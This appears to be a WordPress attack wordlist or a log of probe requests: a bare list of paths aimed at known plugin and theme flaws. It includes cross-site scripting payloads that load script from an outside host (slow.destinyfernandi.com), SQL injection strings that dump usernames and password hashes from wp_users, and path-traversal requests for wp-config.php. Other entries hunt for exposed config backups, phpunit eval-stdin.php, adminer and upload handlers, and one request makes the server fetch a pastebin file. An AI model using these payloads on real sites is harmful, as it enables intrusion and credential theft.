//wp-admin/install.php
/2019/wp-login.php
/2020/wp-login.php
/blog/wp-admin/install.php
/new/wp-admin/install.php
/old/wp-admin/install.php
/old/wp-login.php
/oldsite/wp-admin/install.php
/test/wp-login.php
/wordpress/wp-admin/install.php
/wp-content/plugins/cloudflare/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/wp-content/plugins/dzs-videogallery/class_parts/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/wp-content/plugins/jekyll-exporter/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/wp-content/plugins/mm-plugin/inc/vendors/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/wp-content/plugins/prh-api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/wp-content/plugins/realia/libraries/PayPal-PHP-SDK/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/wp-content/uploads/2018/01/abc/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/wp/wp-admin/install.php
/wp/wp-login.php
/wp1/wp-login.php
/wp2/wp-login.php
admin/wp-login.php
blog/wp-content/plugins/wp-phpmyadmin/phpmyadmin/scripts/setup.php
blog/wp-login.php
test/wp-login.php
wordpress/wp-content/plugins/wp-phpmyadmin/phpmyadmin/scripts/setup.php
wordpress/wp-login.php
wp-admin
wp-admin/
wp-admin/admin-ajax.php
wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=../wp-config.php
wp-admin/admin-ajax.php?action=duplicator_download&file=dupl.txt
wp-admin/admin-ajax.php?action=hc_ajax_save_option
wp-admin/admin-ajax.php?action=import_csv
wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php
wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
wp-admin/admin-ajax.php?action=save_map_name
wp-admin/admin-ajax.php?action=wdt_upload_file
wp-admin/admin-ajax.php?do_reset_wordpress=1
wp-admin/admin-ajax.php?page=wppcp-security-settings-page
wp-admin/admin-ajax.php?page=wppcp-settings
wp-admin/admin-post.php
wp-admin/admin-post.php?action=hc_ajax_save_option
wp-admin/admin-post.php?do_reset_wordpress=1
wp-admin/admin-post.php?page=br-aapf-setup&step=wizard_selectors
wp-admin/admin-post.php?page=fp_admin_options_page
wp-admin/admin-post.php?page=opinionstage-content-login-callback-page&email="><script type=text/javascript src=\'https://slow.destinyfernandi.com/hos?&v15\'></script>
wp-admin/admin-post.php?page=opinionstage-content-login-callback-page&email="><script type=text/javascript src=\'https://slow.destinyfernandi.com/hos?&v6\'></script>
wp-admin/admin-post.php?page=opinionstage-content-login-callback-page&email=(function() { var elem = document.createElement(\'script\'); elem.type = \'text/javascript\'; elem.src = \'https://slow.destinyfernandi.com/hos?clod\';document.getElementsByTagName("head")[0].appendChild(elem);})();
wp-admin/admin-post.php?page=opinionstage-content-login-callback-page&success="><script type=text/javascript src=\'https://slow.destinyfernandi.com/hos?&v15\'></script>
wp-admin/admin-post.php?page=opinionstage-content-login-callback-page&success="><script type=text/javascript src=\'https://slow.destinyfernandi.com/hos?&v6\'></script>
wp-admin/admin-post.php?page=opinionstage-content-login-callback-page&success=(function() { var elem = document.createElement(\'script\'); elem.type = \'text/javascript\'; elem.src = \'https://slow.destinyfernandi.com/hos?clod\';document.getElementsByTagName("head")[0].appendChild(elem);})();
wp-admin/admin-post.php?page=opinionstage-content-login-callback-page&success=(function() { var elem = document.createElement(\'script\'); elem.type = \'text/javascript\'; elem.src = \'https://slow.destinyfernandi.com/hos?clod\';document.getElementsByTagName("head")[0].appendChild(elem);})();&uid=(function() { var elem = document.createElement(\'script\'); elem.type = \'text/javascript\'; elem.src = \'https://slow.destinyfernandi.com/hos?clod\';document.getElementsByTagName("head")[0].appendChild(elem);})();&token=(function() { var elem = document.createElement(\'script\'); elem.type = \'text/javascript\'; elem.src = \'https://slow.destinyfernandi.com/hos?clod\';document.getElementsByTagName("head")[0].appendChild(elem);})();&email=(function() { var elem = document.createElement(\'script\'); elem.type = \'text/javascript\'; elem.src = \'https://slow.destinyfernandi.com/hos?clod\';document.getElementsByTagName("head")[0].appendChild(elem);})();&fly_id=1&article_placement_id=1&sidebar_placement_id=1&return_path=(function() { var elem = document.createElement(\'script\'); elem.type = \'text/javascript\'; elem.src = \'https://slow.destinyfernandi.com/hos?clod\';document.getElementsByTagName("head")[0].appendChild(elem);})();
wp-admin/admin-post.php?page=opinionstage-content-login-callback-page&token="><script type=text/javascript src=\'https://slow.destinyfernandi.com/hos?&v15\'></script>
wp-admin/admin-post.php?page=opinionstage-content-login-callback-page&token="><script type=text/javascript src=\'https://slow.destinyfernandi.com/hos?&v6\'></script>
wp-admin/admin-post.php?page=social-metrics-tracker-export&smt_download_export_file=1&section=gapi
wp-admin/admin-post.php?page=wpim_manage_settings
wp-admin/admin-post.php?page=wpsm_responsive_coming_soon
wp-admin/admin-post.php?page=yuzo-related-post
wp-admin/admin-post.php?testingfsoc=1&url=https://pastebin.com/raw/i1gLLhHJ&filename=wpdemos
wp-admin/admin-post.php?wpematico-action=settings_tab_settings
wp-admin/admin-post.php?yp_remote_get=2
wp-admin/admin-post.php?yp_remote_get=3
wp-admin/admin-post.php?yp_remote_get=test
wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&item=wp-config.php&order=name&srt=yes
wp-admin/plugin-install.php?tab=upload
wp-admin/post-new.php
wp-admin/theme-editor.php
wp-config.php
wp-config.php-bak
wp-config.php.bak
wp-config.php.new
wp-config.php.old
wp-config.php?aam-media=1
wp-config.php_Old
wp-config.php_bak
wp-config.php_new
wp-config.php_old
wp-config.php~
wp-content/adminer.php
wp-content/force-download.php?file=../../../../../../../wp-config.php
wp-content/plugins/CCSlider/includes/upload.php
wp-content/plugins/accessally/resource/backend/css/accessally-manage.css
wp-content/plugins/adminer/inc/editor/index.php
wp-content/plugins/ajax_multi_upload/readme.txt
wp-content/plugins/all-video-gallery/config.php?vid=1&pid=-1+union+select+1,2,3,4,concat(0x7e7e7e,74657374,0x7c7c7c,md5(74657374),0x7e7e7e),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41+--
wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/upload.php
wp-content/plugins/batchmove/js/batch.js
wp-content/plugins/blaze-slide-show-for-wordpress/js/swfupload/js/upload.php
wp-content/plugins/blnmrpb/log.txt
wp-content/plugins/brizy/public/static/css/style.css
wp-content/plugins/cherry-plugin/admin/css/cherry-admin-plugin.css
wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php
wp-content/plugins/contact-form-7/readme.txt
wp-content/plugins/contus-hd-flv-player/uploadVideo.php
wp-content/plugins/contus-video-galleryversion-10/upload1.php
wp-content/plugins/front-file-manager/readme.txt
wp-content/plugins/google-document-embedder/libs/pdf.php?fn=lol.pdf&file=../../../../wp-config.php
wp-content/plugins/google-mp3-audio-player/direct_download.php?file=../../../wp-config.php
wp-content/plugins/hd-webplayer/playlist.php?videoid=1+and+1=2+/*!union*/+/*!select*/+concat(0x7e7e7e,user_login,0x7c7c7c,user_pass,0x7e7e7e),2,3,4,5,6,7,8,9,10,11+from+wp_users
wp-content/plugins/html5avmanager/lib/uploadify/uploadify.css
wp-content/plugins/image-clipboard/readme.txt
wp-content/plugins/inboundio-marketing/admin/partials/csv_uploader.php
wp-content/plugins/indeed-membership-pro/assets/css/templates.css
wp-content/plugins/iwp-client/clipboard.min.js
wp-content/plugins/iwp-client/readme.txt
wp-content/plugins/jekyll-exporter/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
wp-content/plugins/jssor-slider/assets/css/jssor-slider.css
wp-content/plugins/linklove/linklove.php?s=true
wp-content/plugins/mac-dock-gallery/readme.txt
wp-content/plugins/mailcwp/mailcwp-upload.php
wp-content/plugins/mini-mail-dashboard-widgetwp-mini-mail.php?abspath=../../wp-config.php
wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=../../../../wp-config.php
wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php
wp-content/plugins/profile-builder-pro/assets/css/style-front-end.css
wp-content/plugins/profile-builder/assets/css/serial-notice.css
wp-content/plugins/profile-builder/assets/css/style-front-end.css
wp-content/plugins/recent-backups/download-file.php?file_link=../../../wp-config.php
wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php
wp-content/plugins/revslider/temp/update_extract/readme.php
wp-content/plugins/simple-image-manipulator/controller/download.php?filepath=../../../wp-config.php
wp-content/plugins/slide-show-pro/js/swfupload/js/upload.php
wp-content/plugins/smart-slide-show/js/swfupload/js/upload.php
wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php
wp-content/plugins/strong-testimonials/templates/modern/content.css
wp-content/plugins/tera-charts/charts/treemap.php?fn=../../../../wp-config.php
wp-content/plugins/themegrill-demo-importer/assets/js/admin/demo-importer.js
wp-content/plugins/uploadify/includes/check.php
wp-content/plugins/uploadify/readme.txt
wp-content/plugins/woopra/inc/php-ofc-library/ofc_upload_image.php?name=verify.php
wp-content/plugins/wordpress-database-reset/assets/css/bsmselect.css
wp-content/plugins/wp-central/readme.txt
wp-content/plugins/wp-phpmyadmin/wp-phpmyadmin/phpmyadmin/
wp-content/plugins/wp-private-content-plus/css/wppcp-front.css
wp-content/plugins/wp-time-capsule/js/opentip-jquery.js
wp-content/plugins/wp-time-capsule/treeView/common.js
wp-content/plugins/wp-time-capsule/wptc-dialog.css
wp-content/plugins/wpematico/app/js/wpe_hooks.js
wp-content/plugins/wpshopify/dist/public.min.css
wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=../../../../wp-config.php
wp-content/plugins/yellow-pencil-visual-theme-customizer/js/yellow-pencil.js
wp-content/plugins/yuzo-related-post/assets/js/admin.js
wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php
wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php
wp-content/themes/infocus/lib/scripts/dl-skin.php
wp-content/themes/linenity/functions/download.php?imgurl=theme-functions.php&name=theme-functions.php
wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php
wp-content/themes/twentynineteen/404.php
wp-content/themes/twentytwenty/404.php
wp-content/themes/wp-update.php
wp-content/uploads/2017/06/cropped-15-180x180.jpeg
wp-content/uploads/2017/06/cropped-15-192x192.jpeg
wp-content/uploads/2017/06/cropped-15-270x270.jpeg
wp-content/uploads/2017/06/cropped-15-32x32.jpeg
wp-content/uploads/adminer.php
wp-content/uploads/file-manager/log.txt
wp-login.php
wp-login.php?action=register
wp/wp-login.php
wp-content/debug.log
.wp-config.php.swp
wp-config.inc
wp-config.old
wp-config.txt
wp-config.html
wp-config.php.dist
wp-config.php.inc
wp-config.php.save
wp-config.php.swp
wp-config.php.txt
wp-config.php.zip
wp-config.php.html